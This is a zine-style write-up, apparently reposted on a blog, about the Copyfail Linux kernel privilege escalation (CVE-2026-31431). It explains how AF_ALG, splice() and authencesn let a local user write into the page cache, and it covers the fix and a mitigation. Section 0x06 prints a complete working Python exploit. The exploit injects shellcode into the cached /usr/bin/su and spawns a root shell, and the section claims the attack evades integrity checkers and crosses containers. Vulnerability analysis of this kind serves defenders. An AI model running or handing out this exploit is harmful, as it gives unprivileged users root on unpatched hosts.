Noë Flatreaud

732-Bytes to Pwn Linux Kernel

This is a zine repost.
https://ghspace.fr/zine/old/732_bytes_to_pwn_linux_kernel.txt

|=-----------------------------------------------------------------------=|
|=----------------=[ 732-bytes to pwn linux kernel ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ Beemo ]=--------------------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of Contents

    0x01 - Intro
    0x02 - Dramatis Personae - subsystems
    0x03 - The bug nobody saw for 9 years
    0x04 - authencesn, ya cheating little bastard
    0x05 - From 1000 to 0
    0x06 - Proof of concept
    0x07 - Howtf nobody noticed
    0x08 - The fix (4 lines)
    0x09 - Thoughts on copyfail
    0x0a - References

--[ 0x01 - Intro

"Every so often, a bug comes along that makes you question whether
anyone ever reads the code they're committing to."

Every kernel LPE starts the same way. Here's another race 
condition. Here's the window. Here's the heap spray. Here's the 
KASLR leak. Here's the stack pivot and yadayadayda. 

Good luck making it work twice.

Copyfail (CVE-2026-31431) - recently found by Taeyang Lee with a 
little help from AI - doesn't do any of that.

No race. No heap spray. No KASLR bypass. No ROP chain. No compiled 
binary. Just a logic flaw sitting in plain sight since 2017, 
weaponizable in 732 bytes of Python, yielding a juicy root shell 
on every major distro shipped in the last nine years.

You don't even need to be fast. Just a loop, four bytes 
at a time, from a Python script. 

So, how does it work ?.

--[ 0x02 - Dramatis Personae - subsystems


Three kernel subsystems walk into a bar. They've never met.
Each one is fine alone, together they give any local user a write4
primitive into the page cache of any readable file O_o

[*] AF_ALG

    AF_ALG (address family 38) is a socket type that exposes the 
    kernel's crypto subsystem to userspace without caps needed.
    Any user can open one, bind to any registered alg template,
    and run encrypt/decrypt operations. It exists so userspace
    can offload crypto to hw accelerators without needing a 
    kernel module per application.

    In practice, almost nobody uses it. OpenSSL's afalg engine is 
    off by default but most distros compile it in anyway.

    >>> a = socket.socket(38, 5, 0)     # AF_ALG, SOCK_SEQPACKET
    >>> a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))

[*] splice()

	splice() moves data between fds and pipes without copying. when 
	you splice FROM a file, the pipe doesn't get a copy of the data. 
	It gets a reference to the page cache page. The actual physical 
	page.

    >>> splice(file_fd -> pipe)     # pipe now holds page cache ref
    >>> splice(pipe -> alg_fd)      # alg socket now holds page cac

	When you then splice from the pipe into another fd 
	(like our AF_ALG socket), those page cache references travel into
	the crypto subsystem's scatterlist.

    The latter now contains direct pointers to the physical 
    pages that back every read(), mmap(), and execve() of that file 
    on the entire system.

[*] authencesn

    authencesn is an AEAD wrapper. It exists for IPsec Extended 
    Sequence Numbers (RFC 4303), where 64-bit sequence numbers are 
    split across the AAD. 

    The wrapper has to rearrange bytes for HMAC computation.
    To do it, it uses the caller's output buffer as a scratch space, 
    writing 4 bytes past the end of the legitimate output area. 


--[ 0x03 - The bug nobody saw for 9 years


In the old code (pre-2017), src and dst were separate. Page
cache pages were in src (read side). The output went to dst
(user buffer). Safe.

In 2017, commit 72548b093ee3 added an optimization to algif_aead.c: 
perform AEAD operations in-place. 

For decryption, the code now:

  - Copies AAD and ciphertext from the TX scatterlist (which may 
    contain page cache pages from splice) into the RX buffer 
    (the user's recvmsg buffer).

  - Does NOT copy the authentication tag. Instead, it chains the 
  	tag pages from the TX scatterlist onto the end of the RX 
    scatterlist using sg_chain().

  - Sets : req->src = req->dst
    (both point to the same combined scatterlist).


    req->src ----+
                 |
                 v
    req->dst --> [ AAD  ||  CT  ] --> [ Tag (page cache pages) ]
                 ^^^^^^^^^^^^^^^^     ^^^^^^^^^^^^^^^^^^^^^^^^^^
                 \ RX buffer          \ chained from TX SGL -+
                     (user mem)           (file's page cache)


The output scatterlist now has a writable zone (the RX buffer) 
followed immediately by page cache pages of whatever file was 
spliced in. Nothing enforces the boundary between them. Nothing 
documents this as a constraint. It's a silent invariant that every 
AEAD algorithm is expected to honor.

Every AEAD algorithm indeed..Except one.


--[ 0x04 - authencesn, ya cheating little bastard


authencesn handles IPsec Extended Sequence Numbers. 64-bit
seqno split into hi (bytes 0-3) and lo (bytes 4-7) of the AAD.

During decrypt, it needs to rearrange these bytes for the HMAC.
Instead of allocating a scratch buffer it uses the caller's 
destination scatterlist as a notepad:

crypto_authenc_esn_decrypt() ->

    >>> // read first 8 bytes of AAD (seqno_hi || seqno_lo)
    >>> scatterwalk_map_and_copy(tmp, dst, 0, 8, 0);
    >>>
    >>> // write seqno_hi at dst[4..7] (within AAD, fine)
    >>> scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);
    >>> 
    >>> // write seqno_lo at dst[assoclen + cryptlen] (PAST THE END)
    >>> scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);
                                               ^^^^^^^^^^^^^^^^^^^^
                                                \ bug here!

That third write goes 4 bytes past the legitimate output boundary. 

scatterwalk_map_and_copy() faithfully walks the scatterlist, hits 
the sg_chain boundary, maps the page cache page via 
kmap_local_page(), and writes 4 bytes of payload data directly 
into the kernel's cached copy of target file.

The HMAC check runs, fails (the ciphertext is garbage - don't 
care), recvmsg() returns -EBADMSG. Nobody checks the page cache. 
The corrupted page is never marked dirty. The file on disk is 
unchanged. But every subsequent read of that file, from any process, 
from any container, sees the corrupted version.


--[ 0x05 - From 1000 to 0


The full sequence:

    1. Open socket(AF_ALG), bind to authencesn(hmac(sha256),cbc(aes)).
       Set a key. Accept a request socket.

    2. Open /usr/bin/su (or any setuid binary) for reading.

    3. For each 4-byte chunk of your shellcode:

	   a. sendmsg(AAD[8 bytes], cmsg=[DECRYPT, IV, ASSOCLEN=8], MSG_MORE)	
          Where bytes[4:8] = the 4 bytes to write.
          Set assoclen, IV, etc. via cmsg headers.

       b. splice() from /usr/bin/su into a pipe, then from the pipe 
          into the AF_ALG socket. 
          
          splice(target_fd -> pipe, offset=target_page_offset, len=32)
          splice(pipe -> op_fd, len=32)
          
          Choose offset so that the tag region aligns with your target 
          offset in su's .text section.
 
	   c. recv(op_fd) 
          ^^^^^^^^^^
          \ -EBADMSG, but scratch write already fired

		  Triggers the decrypt. authencesn writes your 4 
          bytes into the page cache. HMAC fails. recv() returns 
          error. The page cache is corrupted. Move to next chunk.

    4. execve("/usr/bin/su"). The kernel loads su from the page 
       cache. Your shellcode is in .text. su is setuid root. 

       Congrats, you now root :D

Every process reading that file through the page cache sees the
corruption. execve() loads from page cache. getpwnam() reads 
from page cache but the on-disk file is untouched. fsck is clean, 
tripwire is clean, AIDE is clean, because nothing was written to disk.

No races to win. No timing windows. No kernel version checks. No 
arch-specific gadgets. The same script works on:

    Ubuntu 24.04    (6.17.0-1007-aws)
    Amazon Linux    (6.18.8-9.213.amzn2023)
    RHEL 10.1       (6.12.0-124.45.1.el10_1)
    SUSE 16         (6.12.0-160000.9-default)

..and every other distro that ships the default kernel config with 
AF_ALG enabled.


--[ 0x06 - Proof of concept


The full exploit is 732 bytes minified, but i'll add some
comments for context. You can find the original one here:
https://github.com/theori-io/copy-fail-CVE-2026-31431


--8<-- cut here ---------------------------------------------------[[ BEGIN

#!/usr/bin/env python3

import os as g, zlib, socket as s

def d(x): return bytes.fromhex(x) # htob

def c(f, t, c):

    # f = fd of target file (/usr/bin/su)
    # t = offset within file to write at
    # c = 4 bytes to write (shellcode chunk)
    
    # Open AF_ALG socket, bind authencesn
    # socket(family=AF_ALG, type=SOCK_SEQPACKET, proto=0)
    # https://docs.python.org/3/library/socket.html#socket.socket 

    a = s.socket(38, 5, 0) 
    a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    h = 279  # SOL_ALG
    
    # Set key: 8 bytes key header + 32 bytes AES-256 key
    v = a.setsockopt
    v(h, 1, d('0800010000000010' + '0'*64))
    
    # Set AAD len = 0 (no additional assoclen opt)
    v(h, 5, None, 4)

    # Accept request fd
    u, _ = a.accept()
    
    o = t + 4  # offset adjustment

    # sendmsg() 
    #   (AAD = b"A"*4 + seqno_lo)
    #   (SOL_ALG, ALG_SET_OP)        = decrypt (0x00 * 4)
    #   (SOL_ALG, ALG_SET_IV)        = 16 null bytes
    #   (SOL_ALG, ALG_SET_AEAD_ASSOCLEN) = 8

    i = d('00')
    u.sendmsg(
        [b"A"*4 + c],                  # AAD with payload in seqno_lo
        [
            (h, 3, i*4),               # ALG_SET_OP 	= decrypt
            (h, 2, b'\x10' + i*19),    # ALG_SET_IV 	= 16 zero bytes
            (h, 4, b'\x08' + i*3),     # AEAD_ASSOCLEN 	= 8
        ],
        32768                          # MSG_MORE
    )

    # splice target file pages into AF_ALG socket
    r, w = g.pipe()
    n = g.splice
    n(f, w, o, offset_src=0)   # file -> pipe (page cache refs!)
    n(r, u.fileno(), o)        # pipe -> AF_ALG socket

    # trigger decrypt (authencesn writes seqno_lo into page cache)
    
    try:
        u.recv(8 + t)
    except:
        pass  # EBADMSG expected
        
f = g.open("/usr/bin/su", 0)  # O_RDONLY
i = 0

# Decompress shellcode (execve("/bin/sh") or similar)
e = zlib.decompress(d(
    "78daab77f57163626464800126063b0610af82c101cc7760c004"
    "0e0c160c301d209a154d16999e07e5c1680601086578c0f0ff86"
    "4c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa4999"
    "79fac5190c0c0c0032c310d3"
))

# Write shellcode 4 bytes at a time into su's page cache
while i < len(e):
    c(f, i, e[i:i+4])
    i += 4

# Execute the corrupted setuid binary
g.system("su")

# Dang, you root :D

--8<-- cut here -----------------------------------------------------[[ EOS

Usage:

$ python3 copy_fail_exp.py
$ id
  uid=0(root) gid=1002(user) groups=1002(user)

That's it. 732 bytes. Every distro. Every time.


--[ 0x07 - Howtf nobody noticed


Well...the bug exists because of 3 independently reasonable 
changes by three different developers across six years:


    2011: authencesn added to support IPsec ESN (a5079d084f8b).
          The scratch write at dst[assoclen+cryptlen] is harmless - 
          the only caller is the in-kernel xfrm layer, and src/dst 
          are separate scatterlists. Nobody outside the kernel ever 
          touches this code.

    2015: AF_ALG gains AEAD support (algif_aead.c). splice() can 
          now deliver page cache pages into the crypto scatterlist. 
          authencesn is converted to the new AEAD API (104880a6b470). 
          But AF_ALG uses out-of-place: req->src != req->dst. Page 
          cache pages are in src (read-only). The scratch write goes 
          to dst. Still not exploitable as is.

    2017: In-place optimization (72548b093ee3). req->src = req->dst. 
          Page cache tag pages are chained into the writable 
          destination via sg_chain(). authencesn's scratch write now 
          crosses from the RX buffer into page cache pages.


The corruption is silent - no crash, no kernel log, no visible 
side effect except the page cache being wrong. It doesn't trigger any 
existing kernel self check. No KASAN or UBSAN. No lockdep. No page flags.

The kernel doesn't know the page is corrupted because the write 
went through a legitimate code path (scatterwalk_map_and_copy) on a page
that was legitimately mapped.


--[ 0x08 - The fix (4 lines)


Commit a664bf3d603d reverts algif_aead.c to out-of-place operation:

	diff --git a/before b/after
	index aff63c7..9ca2c95 100644
	--- a/before
	+++ b/after
	@@ -1,5 +1,5 @@
	 aead_request_set_crypt(
	 &areq->cra_u.aead_req,
	-rsgl_src,                          // RX SGL (same as dst)
	-areq->first_rsgl.sgl.sgt.sgl,      // RX SGL
	+tsgl_src,                          // TX SGL (src)
	+areq->first_rsgl.sgl.sgt.sgl,      // RX SGL (dst, separate)
	 used, ctx->iv);

The commit message: "There is no benefit in operating in-place in 
algif_aead since the source and destination come from different 
mappings."

You can temporarely mitigate if you're not able to patch it yet:

    $ echo "install algif_aead /bin/false" \
    	> /etc/modprobe.d/disable-algif-aead.conf
    $ rmmod algif_aead 2>/dev/null

This kills the AF_ALG AEAD socket type. You'll break apps, yes, 
but only those who explicitly bind aead sockets via AF_ALG which in 
practice is almost none.


--[ 0x09 - Thoughts on copyfail


Copyfail might be the cleanest kernel LPE in recent history.

It doesn't need race. It don't need spray. Definitely no leaks. 
It doesn't even need a compiled binary. A 732-byte Python script, 
using only stdlib modules, gets you root on every major Linux 
distribution shipped since 2017. The same script crosses container 
boundaries because the page cache is host-wide.

--[ 0x0a - References

[1] CVE-2026-31431 disclosure
    https://copy.fail/
[2] Xint Code write-up
    https://xint.io/blog/copy-fail-linux-distributions
[3] PoC source
    https://github.com/theori-io/copy-fail-CVE-2026-31431
[4] Kernel fix (a664bf3d603d)
    https://github.com/torvalds/linux/commit/a664bf3d603d
[5] In-place optimization commit (72548b093ee3)
    https://github.com/torvalds/linux/commit/72548b093ee3
[6] authencesn original commit (a5079d084f8b)
    https://github.com/torvalds/linux/commit/a5079d084f8b

|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|

   |          _  ===      B____     _e_                            .
  - -        ( `\( )     | __  |e__| -_|___m_ __o              |
   |          `> /~\ _*  | __ -| -_|___|     | . |            - -
              (_/ /\/    |_____|___|   |_|_|_|___|             |              
        *       \ \       nflatrea@mailo.com                            
                `./       https://nflatrea.bearblog.dev             *
   -                      Made with <3                        ... .

|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|

--[ EOF

#copyfail #cve #hacking #linux